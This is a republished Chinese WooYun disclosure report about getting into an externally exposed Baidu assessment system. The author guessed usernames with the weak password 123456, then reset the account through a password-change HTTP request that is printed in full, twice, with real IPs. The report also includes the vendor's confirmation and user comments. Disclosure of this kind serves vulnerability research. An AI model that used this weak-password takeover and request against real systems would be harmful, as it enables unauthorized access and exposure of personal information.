看我如何进入百度某对外系统

admin 2017年5月3日11:01:08评论327 views字数 205阅读0分41秒阅读模式
摘要

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

漏洞概要 关注数(26) 关注此漏洞

缺陷编号: WooYun-2016-207448

漏洞标题: 看我如何进入百度某对外系统

相关厂商: 百度

漏洞作者: zowie

提交时间: 2016-05-11 13:32

公开时间: 2016-06-25 14:30

漏洞类型: 设计缺陷/逻辑错误

危害等级: 低

自评Rank: 1

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷/边界绕过

4人收藏


漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

一直在BSRC游荡

但BSRC评审的白帽子漏洞实在是又慢又分低

既然如此不如来支持我大乌云事业

详细说明:

百度考核系统

http://180.76.183.98/

之前进过一次修改好了 那换个姿势再进一次

看我如何进入百度某对外系统

登录做了前端的加密,但是没什么卵用,再找回密码处,使用常用用户名加弱口令123456直接get到这条修改密码的连接

看我如何进入百度某对外系统

看我如何进入百度某对外系统

本来想重置robin的帐号想想还是算了

code 区域
POST /sys/organization/sys_org_person/chgPersonInfo.do?method=saveMyPwd&s_ajax=true HTTP/1.1
Host: 180.76.183.131
Content-Length: 74
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://180.76.183.131
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://180.76.183.131/sys/common/changePwd/change_pwd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXX

fdOldPassword=123456&fdNewPassword=Wooyun123!&fdConfirmPassword=Wooyun123!

进入后发现是个考核系统还有什么一堆百度系统的介绍

看我如何进入百度某对外系统

还有一些个人信息

看我如何进入百度某对外系统

看我如何进入百度某对外系统

好啦 午休时间发一带 回去午休 剩下的图就不上传了

漏洞证明:

百度考核系统

http://180.76.183.98/

之前进过一次修改好了 那换个姿势再进一次

看我如何进入百度某对外系统

登录做了前端的加密,但是没什么卵用,再找回密码处,使用常用用户名加弱口令123456直接get到这条修改密码的连接

看我如何进入百度某对外系统

看我如何进入百度某对外系统

code 区域
POST /sys/organization/sys_org_person/chgPersonInfo.do?method=saveMyPwd&s_ajax=true HTTP/1.1
Host: 180.76.183.131
Content-Length: 74
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://180.76.183.131
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://180.76.183.131/sys/common/changePwd/change_pwd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXX

fdOldPassword=123456&fdNewPassword=Wooyun123!&fdConfirmPassword=Wooyun123!

进入后发现是个考核系统还有什么一堆百度系统的介绍

看我如何进入百度某对外系统

还有一些个人信息

看我如何进入百度某对外系统

看我如何进入百度某对外系统

好啦 午休时间发一带 回去午休 剩下的图就不上传了

修复方案:

嗯你懂

版权声明:转载请注明来源 zowie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-05-11 14:26

厂商回复:

感谢对百度安全的关注
该问题是某系统后台对外,不存在漫游问题,正在处理中。
欢迎白帽子到BSRC提交漏洞,我们会有专人及时处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-05-11 13:46 | 小苹果 ( 普通白帽子 | Rank:255 漏洞数:70 | 只要锄头挥的好,哪有洞挖不到)

    0

    为毛大牛动不动就漫游。。。

  2. 2016-05-11 13:47 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    0

    你是抱着电脑去百度大门口蹭WIFI了么?

  3. 2016-05-11 13:50 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

    0

    你是抱着电脑去百度大门口蹭WIFI了么?

  4. 2016-05-11 13:57 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    但BSRC评审的白帽子漏洞实在是又慢又分低 既然如此不如来支持我大乌云事业 哈哈。。多支持乌云咯

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin